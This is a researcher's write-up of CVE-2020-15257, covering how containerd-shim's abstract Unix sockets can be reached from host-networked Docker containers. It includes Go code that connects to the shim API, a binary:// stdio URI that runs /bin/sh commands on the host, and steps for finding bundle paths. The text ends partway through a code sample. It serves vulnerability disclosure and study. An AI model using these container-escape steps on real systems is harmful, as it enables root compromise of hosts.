This post is a technical discussion of the underlying vulnerability of CVE-2020-15257, and how it can be exploited. Our technical advisory on this issue is available here, but this post goes much further into the process that led to finding the issue, the practicalities of exploiting the vulnerability itself, various complications around fixing the issue, and some final thoughts.
During an assessment a while back, I found an issue that enabled running arbitrary code in a Docker container that was running with host networking (e.g. --network=host). Normally, this is pretty bad, because with Docker’s default capabilities, host networking enables listening in on all traffic and sending raw packets from arbitrary interfaces. But on the given system, there wasn’t a ton of attack surface; all traffic was encrypted directly to processes without load balancers and the only interesting attack seemed to be using raw packets to handshake with Let’s Encrypt and mint TLS certificates.
Sometime later, I started to think about it again and noticed something when running a netstat command while in a host network Docker container:
# netstat -xlp
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name     Path
...
unix  2      [ ACC ]     STREAM     LISTENING     178355   -                    /var/snap/lxd/common/lxd/unix.socket
...
unix  2      [ ACC ]     STREAM     LISTENING     21723    -                    /run/containerd/containerd.sock.ttrpc
unix  2      [ ACC ]     STREAM     LISTENING     21725    -                    /run/containerd/containerd.sock
unix  2      [ ACC ]     STREAM     LISTENING     21780    -                    /var/run/docker/metrics.sock
unix  2      [ ACC ]     STREAM     LISTENING     14309    -                    /run/systemd/journal/io.systemd.journal
unix  2      [ ACC ]     STREAM     LISTENING     23321    -                    /var/run/docker/libnetwork/496e19fa620c.sock
unix  2      [ ACC ]     STREAM     LISTENING     18640    -                    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     305835   -                    @/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock@
...
unix  2      [ ACC ]     STREAM     LISTENING     18645    -                    /run/docker.sock
...
As a refresher, normal Unix domain sockets are bound to a file path, but Linux supports “abstract namespace” Unix domain sockets that do not exist on the filesystem. These abstract Unix sockets are created in much the same way as normal Unix sockets, using a sockaddr_un struct:
struct sockaddr_un {
    sa_family_t sun_family;    /* AF_UNIX */
    char        sun_path[108]; /* Pathname */
};
While normal pathed Unix sockets use a sun_path containing a NUL-terminated C string, abstract Unix sockets’ sun_path begins with a null byte and can contain arbitrary binary content; their length is actually based on the size passed in to the bind(2) syscall, which can be less than the size of the sockaddr_un struct. The initial null byte in an abstract Unix socket is generally represented with an @ sign when printed.
Pathed Unix domain sockets can only be connect(2)-ed to through the filesystem, and therefore host rootfs-bound pathed Unix sockets cannot generally be accessed from a container with a pivot_root(2)-ed rootfs. However, abstract namespace Unix domain sockets are tied to network namespaces, so a container that shares the host’s network namespace can reach them.
Note: Oddly enough, even though access to pathed Unix sockets isn’t tied to the network namespace a process is associated with, /proc/net/unix (which is what the above netstat command reads to obtain its output) lists pathed Unix sockets based on the network namespace they were bound from.
In the above netstat output, we can clearly see a bunch of pathed Unix sockets related to container runtimes, e.g. LXD, Docker, and containerd. But we also see an abstract Unix socket in the form of /containerd-shim/<id>.sock. One of these appears for each Docker container that is running on a given system.
Unlike pathed Unix sockets, which have base access control checks applied based on their Unix file permissions, abstract Unix sockets have no built-in access controls, so a server listening on one must validate connections dynamically by pulling ancillary data with recvmsg(2) (this is also how Unix sockets can pass file descriptors between processes). So we try to connect(2) and…
# socat abstract-connect:/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock -
...
socat[15] E connect(5, AF=1 "\0/containerd-shim/e4c6adc8de8a1a0168e9b71052e2f6b06c8acf5eeb5628c83c3c7521a28e482e.sock", 89): Connection refused
“Connection refused.” So my first assumption was that, whatever this thing is, it’s validating incoming connections somehow. Perhaps it only accepts one connection at a time?
Reading a bit about the architecture of Docker and containerd,1 which was spun out of Docker, we find that containerd-shim
is the direct parent of a container’s init process. This is easily observed with the following commands run from the host:
# netstat -xlp | grep shim
unix  2      [ ACC ]     STREAM     LISTENING     348524   29533/containerd-sh  @/containerd-shim/....sock@
# pstree -Tspn 29533
systemd(1)───containerd(733)───containerd-shim(29533)───sh(29550)
So how does this thing get set up in the first place? The relevant code is part of the main containerd daemon, runtime/v1/shim/client/client.go
:2
func WithStart(binary, address, daemonAddress, cgroup string, debug bool, exitHandler func()) Opt {
	return func(ctx context.Context, config shim.Config) (_ shimapi.ShimService, _ io.Closer, err error) {
		socket, err := newSocket(address)
		if err != nil {
			return nil, nil, err
		}
		defer socket.Close()
		f, err := socket.File()
		...
		cmd, err := newCommand(binary, daemonAddress, debug, config, f, stdoutLog, stderrLog)
		if err != nil {
			return nil, nil, err
		}
		if err := cmd.Start(); err != nil {
			return nil, nil, errors.Wrapf(err, "failed to start shim")
		}
		...

func newCommand(binary, daemonAddress string, debug bool, config shim.Config, socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
	selfExe, err := os.Executable()
	if err != nil {
		return nil, err
	}
	args := []string{
		"-namespace", config.Namespace,
		"-workdir", config.WorkDir,
		"-address", daemonAddress,
		"-containerd-binary", selfExe,
	}
	...
	cmd := exec.Command(binary, args...)
	...
	cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
	cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
	...

func newSocket(address string) (*net.UnixListener, error) {
	if len(address) > 106 {
		return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
	}
	l, err := net.Listen("unix", "\x00"+address)
In short, the functor returned from WithStart() creates an abstract Unix socket from a provided address using newSocket(). It then extracts the raw file descriptor from it and passes it directly to the child containerd-shim process it starts with newCommand(). We can confirm that this is the code creating our observed containerd-shim process by the command line arguments and environment variables it passes to the child:
# ps -q 29533 -o command= | cat
containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/75aa678979e7f94411ab7a5e08e773fe5dff26a8852f59b3f60de48e96e32afc -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
# cat /proc/29533/environ | grep -a -E -o 'GOMAXPROCS=[0-9]+'
GOMAXPROCS=2
So what now? Well, we can confirm the behavior of the containerd-shim
binary with respect to how it listens on the abstract Unix socket. The relevant code is within cmd/containerd-shim/main_unix.go
:3
func serve(ctx context.Context, server *ttrpc.Server, path string) error {
	var (
		l   net.Listener
		err error
	)
	if path == "" {
		f := os.NewFile(3, "socket")
		l, err = net.FileListener(f)
		f.Close()
		path = "[inherited from parent]"
	} else {
		if len(path) > 106 {
			return errors.Errorf("%q: unix socket path too long (> 106)", path)
		}
		l, err = net.Listen("unix", "\x00"+path)
	}
Because my suspicion was that only the first connection to this socket is accepted, it would seem that there is a race condition in the above snippets whereby an attacker could list out the abstract namespace “path” before the containerd-shim
process is even spawned and hammer it for connections to get the first accept(2)
from containerd-shim
. I then made a modified version of the code that starts containerd-shim
so that it could be tested in isolation.
package main

import (
	"fmt"
	"io"
	"net"
	"os"
	"os/exec"
	"syscall"

	"github.com/pkg/errors"
)

func newSocket(address string) (*net.UnixListener, error) {
	if len(address) > 106 {
		return nil, errors.Errorf("%q: unix socket path too long (> 106)", address)
	}
	l, err := net.Listen("unix", "\x00"+address)
	if err != nil {
		return nil, errors.Wrapf(err, "failed to listen to abstract unix socket %q", address)
	}
	return l.(*net.UnixListener), nil
}

func newCommand(socket *os.File, stdout, stderr io.Writer) (*exec.Cmd, error) {
	args := []string{
		"-namespace", "moby",
		"-workdir", "/var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo",
		"-address", "/run/containerd/containerd.sock",
		"-containerd-binary", "/usr/bin/containerd",
		"-runtime-root", "/var/run/docker/runtime-runc",
		"-debug",
	}
	cmd := exec.Command("/usr/bin/containerd-shim", args...)
	cmd.Dir = "/run/containerd/io.containerd.runtime.v1.linux/moby/yolo"
	cmd.SysProcAttr = &syscall.SysProcAttr{
		Setpgid: true,
	}
	cmd.ExtraFiles = append(cmd.ExtraFiles, socket)
	cmd.Env = append(os.Environ(), "GOMAXPROCS=2")
	cmd.Stdout = stdout
	cmd.Stderr = stderr
	return cmd, nil
}

func main() {
	socket, err := newSocket("yoloshim")
	if err != nil {
		fmt.Printf("err: %s\n", err)
		return
	}
	defer socket.Close()
	f, err := socket.File()
	if err != nil {
		fmt.Printf("failed to get fd for socket\n")
		return
	}
	defer f.Close()
	stdoutLog, err := os.Create("/tmp/shim-stdout.log.txt")
	stderrLog, err := os.Create("/tmp/shim-stderr.log.txt")
	defer stdoutLog.Close()
	defer stderrLog.Close()
	cmd, err := newCommand(f, stdoutLog, stderrLog)
	if err != nil {
		fmt.Printf("err: %s\n", err)
		return
	}
	if err := cmd.Start(); err != nil {
		fmt.Printf("failed to start shim: %s\n", err)
		return
	}
	defer func() {
		if err != nil {
			cmd.Process.Kill()
		}
	}()
	go func() {
		cmd.Wait()
		if stdoutLog != nil {
			stdoutLog.Close()
		}
		if stderrLog != nil {
			stderrLog.Close()
		}
	}()
}
Separately, I also wrote some code to connect to the containerd-shim
socket:
package main

import (
	"context"
	"fmt"
	"os"
	"time"

	"github.com/containerd/containerd/pkg/dialer"
	shimapi "github.com/containerd/containerd/runtime/v1/shim/v1"
	"github.com/containerd/ttrpc"
	ptypes "github.com/gogo/protobuf/types"
)

func main() {
	ctx := context.Background()
	socket := os.Args[1]
	conn, err := dialer.Dialer("\x00"+socket, 5*time.Second)
	if err != nil {
		fmt.Printf("failed to connect: %s\n", err)
		return
	}
	client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
		fmt.Printf("connection closed\n")
	}))
	c := shimapi.NewShimClient(client)
	var empty = &ptypes.Empty{}
	info, err := c.ShimInfo(ctx, empty)
	if err != nil {
		fmt.Printf("err: %s\n", err)
		return
	}
	fmt.Printf("info.ShimPid: %d\n", info.ShimPid)
}
So we run it and then try to connect to the containerd-shim
socket we created…
# mkdir -p /run/containerd/io.containerd.runtime.v1.linux/moby/yolo
# mkdir -p /var/lib/containerd/io.containerd.runtime.v1.linux/moby/yolo/
# ./startshim
# ./connectortest yoloshim
info.ShimPid: 12866
And that seems to work. For good measure, we’ll get rid of this containerd-shim
, start another one, and try socat
again:
# socat ABSTRACT-CONNECT:yoloshim -
...
socat[12890] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
It fails, again. But our connection test code works:
# ./connectortest yoloshim
info.ShimPid: 13737
So what’s going on? Let’s see what the test code is actually doing:
# strace -e socat ABSTRACT-CONNECT:yoloshim -
...
socket(AF_UNIX, SOCK_STREAM, 0) = 5
connect(5, {sa_family=AF_UNIX, sun_path=@"yoloshim"}, 11) = -1 ECONNREFUSED (Connection refused)
...
# strace -f -x ./connectortest yoloshim
execve("./connectortest", ["./connectortest", "yoloshim"], 0x7ffdb4ce9e98 /* 18 vars */) = 0
...
[pid 13842] socket(AF_UNIX, SOCK_STREAM|SOCK_CLOEXEC|SOCK_NONBLOCK, 0) = 3
[pid 13842] setsockopt(3, SOL_SOCKET, SO_BROADCAST, [1], 4) = 0
[pid 13842] connect(3, {sa_family=AF_UNIX, sun_path=@"yoloshim\0"}, 12) = 0
...
[pid 13842] write(3, "\0\0\0001\0\0\0\1\1\0\n%containerd.runtime.l"..., 59) = 59
...
[pid 13844] read(3, "\0\0\0\5\0\0\0\1\2\0\22\3\10\251k", 4096) = 15
...
[pid 13842] write(1, "info.ShimPid: 13737\n", 20info.ShimPid: 13737
) = 20
[pid 13842] exit_group(0 <unfinished ...>
...
+++ exited with 0 +++
Looking closely, it appears that when the Go code connects, it embeds a null byte within the abstract Unix domain socket “path.” Digging into Go’s internals, it appears that Go does know how to handle abstract paths:4
func (sa *SockaddrUnix) sockaddr() (unsafe.Pointer, _Socklen, error) {
	name := sa.Name
	n := len(name)
	...
	sl := _Socklen(2)
	if n > 0 {
		sl += _Socklen(n) + 1
	}
	if sa.raw.Path[0] == '@' {
		sa.raw.Path[0] = 0
		// Don't count trailing NUL for abstract address.
		sl--
	}
However, this is arguably the wrong behavior as abstract Unix sockets can start with a literal @ sign, and this implementation would prevent idiomatic Go from ever connect(2)-ing (or bind(2)-ing) to them. Regardless, because containerd embeds a raw \x00 at the start of the address, Go’s internals keep the null byte at the end. If you look all the way at the top of this post, you’ll see that there is, in fact, a second @ at the end of the containerd-shim socket. And I probably should have noticed it; it’s definitely a bit more obvious with our test socket:
# netstat -xlp | grep yolo
unix  2      [ ACC ]     STREAM     LISTENING     93884    13737/containerd-sh  @yoloshim@
But our initial test case would have failed anyway. socat
doesn’t have a direct means of supporting arbitrary binary in abstract Unix domain socket “paths.” You can emulate some of it with something like the following:
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x01')" -
...
socat[15094] E connect(5, AF=1 "\0yoloshim\x01", 12): Connection refused
But because POSIX is built around NUL-terminated C strings, the same cannot be done for null bytes, as they will fail to pass through execve(2)
:
# socat "$(echo -en 'ABSTRACT-CONNECT:yoloshim\x00')" -
...
socat[15099] E connect(5, AF=1 "\0yoloshim", 11): Connection refused
This is actually an issue we ran into when writing unixdump
, a tcpdump
-alike for Unix sockets. As a workaround, we added the -@
flag5 that tells unixdump
to parse the socket argument as base64, specifically so that null bytes and arbitrary binary could be used. Basically, this is something I definitely should have recognized the first time.
Now having a connection testing binary, we can relatively easily test if a host network namespace container can connect to our containerd-shim
or a real one:
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro ubuntu:18.04 /bin/sh
# /connectortest yoloshim
info.ShimPid: 13737
# cat /proc/net/unix | grep shim
0000000000000000: 00000002 00000000 00010000 0001 01 93884 @yoloshim@
0000000000000000: 00000002 00000000 00010000 0001 01 114224 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
0000000000000000: 00000003 00000000 00000000 0001 03 115132 @/containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock@
# /connectortest /containerd-shim/moby/2f59727263c3d8bf43ee9d2b5cc2d3218ea7c18b5abb924017873f769feb5ca5/shim.sock
info.ShimPid: 15471
And it can, and that’s bad. But what is the underlying reason that we are able to connect in the first place? Looking at the containerd-shim
code that starts the service, we see that it sets up a ttrpc
“handshaker” with ttrpc.UnixSocketRequireSameUser()
:6
func newServer() (*ttrpc.Server, error) {
	return ttrpc.NewServer(ttrpc.WithServerHandshaker(ttrpc.UnixSocketRequireSameUser()))
}
For reference, ttrpc
is containerd
’s custom gRPC implementation that uses a custom wire protocol not based on TLS/HTTP/H2 and focuses on supporting embedded environments. The implementation of ttrpc.UnixSocketRequireSameUser()
is shown below:7
// UnixSocketRequireUidGid requires specific *effective* UID/GID, rather than the real UID/GID.
//
// For example, if a daemon binary is owned by the root (UID 0) with SUID bit but running as an
// unprivileged user (UID 1001), the effective UID becomes 0, and the real UID becomes 1001.
// So calling this function with uid=0 allows a connection from effective UID 0 but rejects
// a connection from effective UID 1001.
//
// See socket(7), SO_PEERCRED: "The returned credentials are those that were in effect at the time of the call to connect(2) or socketpair(2)."
func UnixSocketRequireUidGid(uid, gid int) UnixCredentialsFunc {
	return func(ucred *unix.Ucred) error {
		return requireUidGid(ucred, uid, gid)
	}
}
...
func UnixSocketRequireSameUser() UnixCredentialsFunc {
	euid, egid := os.Geteuid(), os.Getegid()
	return UnixSocketRequireUidGid(euid, egid)
}
...
func requireUidGid(ucred *unix.Ucred, uid, gid int) error {
	if (uid != -1 && uint32(uid) != ucred.Uid) || (gid != -1 && uint32(gid) != ucred.Gid) {
		return errors.Wrap(syscall.EPERM, "ttrpc: invalid credentials")
	}
	return nil
}
Essentially, the only check performed is that the user connecting is the same user as the one containerd-shim
is running as. In the standard case, this is root. However, if we are assuming a standard Docker container configuration with host networking, then we can also assume that the container is not user namespaced; in fact, neither Docker, nor containerd/runc appear to support the combination of host networking with user namespaces. Essentially, because root on the inside of the container is in fact the same root user by UID outside the container, we can connect to containerd-shim
, even without capabilities.
$ docker run -it --network host --userns host -v /mnt/hgfs/go/connector/connectortest:/connectortest:ro --cap-drop ALL ubuntu:18.04 /bin/sh
# /connectortest /containerd-shim/moby/419fa8aca5a8a5edbbdc5595cda9142ca487770616f5a3a2af0edc40cacadf89/shim.sock
info.ShimPid: 3278
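The reason the check passes can be modeled in a few lines. This is a simplified sketch of the comparison quoted above, not the ttrpc code itself: it omits the -1 wildcard handling, and the peerCred type and sameUser function are hypothetical names. The remapped UID 165536 is only an example value for what container root might look like from the host under user namespace remapping.

```go
package main

import "fmt"

// peerCred stands in for the UID/GID pair a server reads via SO_PEERCRED.
// (Hypothetical type for illustration.)
type peerCred struct {
	UID, GID uint32
}

// sameUser accepts a peer only when its UID and GID equal the server's
// effective UID and GID, which is the essence of the quoted check.
func sameUser(peer peerCred, serverUID, serverGID int) bool {
	return uint32(serverUID) == peer.UID && uint32(serverGID) == peer.GID
}

func main() {
	// containerd-shim typically runs as root, so the server side is 0/0.
	cases := map[string]peerCred{
		"container root, no user namespace":       {UID: 0, GID: 0},
		"container root, remapped (example value)": {UID: 165536, GID: 165536},
		"unprivileged user":                        {UID: 1001, GID: 1001},
	}
	for name, cred := range cases {
		fmt.Printf("%-42s accepted=%v\n", name, sameUser(cred, 0, 0))
	}
}
```

Nothing in this comparison involves capabilities or namespaces, which is why dropping all capabilities in the container does not change the outcome.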
So how bad is this actually? Pretty bad as it turns out.
But let’s take a slight segue and talk about how this issue was remediated. We first reached out to the containerd project with this advisory (also linked below). Initially, the issue was not accepted as a vulnerability because the project considered host namespacing itself to be an intractable security issue. Needless to say, I disagree with such a notion, but it was also a bit of a red herring, and after some rounds of discussion, the core issue — that containerd creates highly sensitive Unix sockets that are highly exposed — was accepted. It is worth noting that, at one point, one developer claimed that this particular issue was well known, though there does not appear to be any evidence of this being the case (at least in English); if it were, the security community would have likely jumped on the issue long ago, though the null byte quirk may have been misconstrued as an access control check.
Overall, the path to a fix wound through a couple of options before our main recommended fix, switching to pathed Unix domain sockets, was implemented. While some of these other attempts had problems that would have enabled bypasses or opened alternate avenues of attack, I think it’s important to discuss what could have been and what would have gone wrong.
Note: While security practitioners reading this post may think that switching to pathed Unix domain sockets should have been so trivial as not to have required effort to be invested into the potential hardening of abstract sockets, it is worth noting that an implicit assumption of the containerd codebase was that these sockets were essentially garbage collected on container exit. Therefore, because this was not rocket science,8 any attempt to add pathed Unix sockets required a significant amount of cleanup code and non-trivial exit detection logic to invoke it at the right times.
One of the earliest discussions was on the feasibility of applying AppArmor or SELinux policies that would prevent access to the abstract containerd sockets. While recent versions of both AppArmor and SELinux support restricting access to abstract namespace Unix domain sockets, they are not an ideal fix. As containerd itself is not generally the component within a containerization toolchain that creates such LSM policies for containers, any such attempt to use them for this purpose would have to be implemented by each client of containerd, or by end-users if they even have the privilege to reconfigure those policies — which brings a large risk of misconfiguring or accidentally eliminating the default sets of rules that help to enforce the security model of containers. Additionally, even for containerd clients such as dockerd
it would be tricky to implement in a clean manner as there would be a chicken-and-egg problem with attempting to restrict access as the implementation- and version-specific scheme for containerd’s internal abstract sockets would need to be hardcoded within the client’s policy generator. While this could be done for Docker’s native support for AppArmor,9 anyone attempting to use the legitimate Docker on Red Hat’s distros (e.g. RHEL, CentOS, Fedora) instead of their also-ran podman would likely remain vulnerable to this issue. Red Hat’s SELinux ruleset for Docker was only ever a catch-up playing imitation of the genuine AppArmor policy and it is now likely unmaintained given their shift in focus to their Docker clone.
Another proposed fix was to introduce a form of authentication whereby, on connecting to the abstract socket, a client would need to provide a token value to prove its identity. However, the implementation used a single shared token value stored on disk and had no mechanism to prevent or rate-limit would-be clients from simply guessing the token value. While the initial implementation of this scheme had a timing side-channel due to a non-constant time token comparison — which could be heavily abused due to the communication occurring entirely on the same host through Unix sockets, without the overhead of the network stack — and also used a token generation scheme with slight biases, the main issues with this scheme are more operational. In addition to the fact that a protocol change such as this would potentially be so breaking as not to be backported, leaving large swathes of users exposed, it would also kick the can and create a valuable target for an attacker to obtain (i.e. the token) that could re-open the issue.
One of the more interesting proposed fixes was a scheme whereby the PID of the caller could be obtained from the peer process Unix credentials of the socket accessed using getsockopt(2)’s SOL_SOCKET SO_PEERCRED option. With this PID, it would be possible to compare raw namespace ID values between the containerd-shim process on the host and the client process (e.g. via readlink /proc/<pid>/ns/mnt). While this is definitely a cool way of validating the execution context of a client, it’s also extremely prone to race conditions. There is no guarantee that, by the time userland code in the server calls getsockopt(2) (or in the case of a client’s setsockopt(2) call with SOL_SOCKET and SO_PASSCRED, where the server receives an ancillary message each time data is sent) and processes the Unix credential data, the client hasn’t passed the socket to a child, exited, and let another process take its PID. In fact, this is a fairly easy race to win as the client can wait or create a number of processes for PID wraparound to begin anew on the host and get close to its PID before exiting. In general, attempting to determine that the actual process connecting or sending a message to a Unix socket is the one you think it is was likely outside the threat model of SO_PEERCRED/SO_PASSCRED/SCM_CREDENTIALS, and is fraught with danger if the client has UID/GID 0 (or effective CAP_SETUID/CAP_SETGID).
Given that we can talk to the containerd-shim
API, what does that actually get us? Going through the containerd-shim
API protobuf,10 we can see an API similar to Docker:
service Shim {
	...
	rpc Create(CreateTaskRequest) returns (CreateTaskResponse);
	rpc Start(StartRequest) returns (StartResponse);
	rpc Delete(google.protobuf.Empty) returns (DeleteResponse);
	...
	rpc Checkpoint(CheckpointTaskRequest) returns (google.protobuf.Empty);
	rpc Kill(KillRequest) returns (google.protobuf.Empty);
	rpc Exec(ExecProcessRequest) returns (google.protobuf.Empty);
	...
}
While a number of these APIs can do fairly damaging things, the Create()
and Start()
APIs are more than enough to compromise a host, but maybe not in the way you might think. Obviously, if you can start an arbitrary container config you can run the equivalent of a --privileged
container, given that containerd-shim
generally runs as full root. But how are you going to get such a config file and have containerd-shim
load it? Let’s first take a look at the CreateTaskRequest
message passed to Create()
and the StartRequest
message passed to Start()
:
message CreateTaskRequest {
	string id = 1;
	string bundle = 2;
	string runtime = 3;
	repeated containerd.types.Mount rootfs = 4;
	bool terminal = 5;
	string stdin = 6;
	string stdout = 7;
	string stderr = 8;
	string checkpoint = 9;
	string parent_checkpoint = 10;
	google.protobuf.Any options = 11;
}

message StartRequest {
	string id = 1;
}
As we can see from this, the pairing of these calls is very much like docker create
and docker start
in that the Start()
call simply starts a container configured by Create()
. So what can we do with Create()
? A fair amount as it turns out, but there are some restrictions. For example, at the start of Create()
,11 if any mounts are contained in the rootfs
field, Create()
will use the base filepath provided with the bundle
field to create a rootfs
directory. As of containerd 1.3.x, if it cannot create the directory (e.g. because it already exists) Create()
will fail early.
func (s *Service) Create(ctx context.Context, r *shimapi.CreateTaskRequest) (_ *shimapi.CreateTaskResponse, err error) {
	var mounts []process.Mount
	for _, m := range r.Rootfs {
		mounts = append(mounts, process.Mount{
			Type:    m.Type,
			Source:  m.Source,
			Target:  m.Target,
			Options: m.Options,
		})
	}
	rootfs := ""
	if len(mounts) > 0 {
		rootfs = filepath.Join(r.Bundle, "rootfs")
		if err := os.Mkdir(rootfs, 0711); err != nil && !os.IsExist(err) {
			return nil, err
		}
	}
	...
The bulk of the work in Create()
is handled through a call to process.Create(ctx, config)
. The purpose of containerd-shim
here is essentially to serve as a managed layer around runc
; for example, the bundle
field is passed directly to runc create --bundle <bundle>
, which will expect it to contain a config.json
file with the container config. However, another interesting facet of this function is how it processes the stdio fields, stdin
, stdout
, and stderr
with the createIO()
function.12
func createIO(ctx context.Context, id string, ioUID, ioGID int, stdio stdio.Stdio) (*processIO, error) {
	pio := &processIO{
		stdio: stdio,
	}
	...
	u, err := url.Parse(stdio.Stdout)
	if err != nil {
		return nil, errors.Wrap(err, "unable to parse stdout uri")
	}
	if u.Scheme == "" {
		u.Scheme = "fifo"
	}
	pio.uri = u
	switch u.Scheme {
	case "fifo":
		pio.copy = true
		pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
	case "binary":
		pio.io, err = NewBinaryIO(ctx, id, u)
	case "file":
		filePath := u.Path
		if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil {
			return nil, err
		}
		var f *os.File
		f, err = os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
		if err != nil {
			return nil, err
		}
		f.Close()
		pio.stdio.Stdout = filePath
		pio.stdio.Stderr = filePath
		pio.copy = true
		pio.io, err = runc.NewPipeIO(ioUID, ioGID, withConditionalIO(stdio))
	...
Since containerd 1.3.0, the containerd-shim
Create()
API stdio fields can be URIs that represent things like an IO processing binary that is run immediately in the context of containerd-shim
, outside any form of Linux namespacing. For example, the general structure of such a URI is the following:
binary:///bin/sh?-c=cat%20/proc/self/status%20>/tmp/foobar
The only restriction is that to run a binary IO processor, the ttrpc
connection must declare a containerd namespace. This is not a Linux namespace but an identifier used to help containerd to organize operations by client container runtime. One such way of passing this check is the following:
ctx := context.Background()
md := ttrpc.MD{}
md.Set("containerd-namespace-ttrpc", "notmoby")
ctx = ttrpc.WithMetadata(ctx, md)
conn, err := getSocket()
if err != nil {
	fmt.Printf("err: %s\n", err)
	return
}
client := ttrpc.NewClient(conn, ttrpc.WithOnClose(func() {
	fmt.Printf("connection closed\n")
}))
c := shimapi.NewShimClient(client)
...
However, this is not as much of an interesting payload and it also doesn’t work with containerd 1.2.x, which is the version used by Docker’s own packaging. Instead, the underlying stdio implementation for 1.2.x only appears to support appending to existing files. In contrast, containerd 1.3.0’s file://
URIs will also create new files (and any necessary directories) if they do not exist.
To perform most of these operations, a valid bundle
path must be passed to Create()
. Luckily, there are two means available to us to make such a thing happen. The first is to use one’s own container’s ID to reference its legitimate containerd bundle
path (e.g. /run/containerd/io.containerd.runtime.v1.linux/moby/<id>/config.json
); the ID is available within /proc/self/cgroup
.
# cat /proc/self/cgroup
12:cpuset:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
11:pids:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
10:devices:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
9:cpu,cpuacct:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
8:net_cls,net_prio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
7:blkio:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
6:freezer:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
5:hugetlb:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
4:perf_event:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
3:rdma:/
2:memory:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
1:name=systemd:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237
0::/system.slice/containerd.service
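Pulling the ID out of that listing is mechanical. The sketch below, with hypothetical helper names, scans cgroup text for a /docker/<id> path and builds the bundle directory from the base path mentioned above. It assumes the cgroup v1 layout shown in this post; other cgroup drivers or layouts would need different matching.

```go
package main

import (
	"bufio"
	"fmt"
	"path"
	"strings"
)

// bundleBase is the containerd v1 runtime directory quoted in this post.
const bundleBase = "/run/containerd/io.containerd.runtime.v1.linux/moby"

// containerID returns the ID from the first "/docker/<id>" cgroup path.
func containerID(cgroup string) (string, bool) {
	sc := bufio.NewScanner(strings.NewReader(cgroup))
	for sc.Scan() {
		// Each line has the form "hierarchy-ID:controllers:path".
		parts := strings.SplitN(sc.Text(), ":", 3)
		if len(parts) != 3 || !strings.HasPrefix(parts[2], "/docker/") {
			continue
		}
		if id := strings.TrimPrefix(parts[2], "/docker/"); id != "" {
			return id, true
		}
	}
	return "", false
}

// bundlePath joins the base directory and the container ID.
func bundlePath(id string) string {
	return path.Join(bundleBase, id)
}

func main() {
	sample := "3:rdma:/\n" +
		"2:memory:/docker/bdd664c53d5a289e17e138f4746b412c51ec773402d5936e69520a2cba642237\n" +
		"0::/system.slice/containerd.service\n"
	if id, ok := containerID(sample); ok {
		fmt.Println(bundlePath(id))
	}
}
```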
Note: The config.json
file within the bundle
directory will contain the host path to the container’s root filesystem.
The second, which I only learned would be possible after I had written an exploit based on the first method, is to create a runc bundle configuration within your own container’s filesystem; the base path for your container’s filesystem on the host is available from the /etc/mtab
file mounted into the container (thanks @drraid/@0x7674).
# head -n 1 /etc/mtab overlay / overlay rw,relatime,lowerdir=/var/lib/docker/165536.165536/overlay2/l/EVYWL6E5PMDAS76BQVNOMGHLCA:/var/lib/docker/165536.165536/overlay2/l/WGXNHNVFLLGUXW7AWYAHAZJ3OJ:/var/lib/docker/165536.165536/overlay2/l/MC6M7WQGXRBLA5TRN5FAXRE3HH:/var/lib/docker/165536.165536/overlay2/l/XRVQ7R6RZ7XZ3C3LKQSAZDMFAO:/var/lib/docker/165536.165536/overlay2/l/VC7V4VA5MA3R4Z7ZYCHK5DVETT:/var/lib/docker/165536.165536/overlay2/l/5NBSWKYN7VDADBTD3R2LJRXH3M,upperdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/diff,workdir=/var/lib/docker/165536.165536/overlay2/c4f65693109073085e63757644e1576e386ba0854ed1811d307cea22f9406437/work,xino=off 0 0
Note: The shared base directory of the upperdir
and workdir
paths contains a merged/
subdirectory that is the root of the container filesystem.
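The derivation in the note above can be sketched as follows: take the upperdir option from the overlay line, go up one directory, and append merged. The mergedDir helper is a hypothetical name and the sample line in main uses a shortened, made-up layer ID; the sketch assumes the overlay2 layout shown in this post.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// mergedDir derives the host path of the container root from an overlay
// mtab line by replacing the last component of upperdir with "merged".
func mergedDir(mtabLine string) (string, bool) {
	// Fields: device, mount point, filesystem type, options, dump, pass.
	fields := strings.Fields(mtabLine)
	if len(fields) < 4 || fields[2] != "overlay" {
		return "", false
	}
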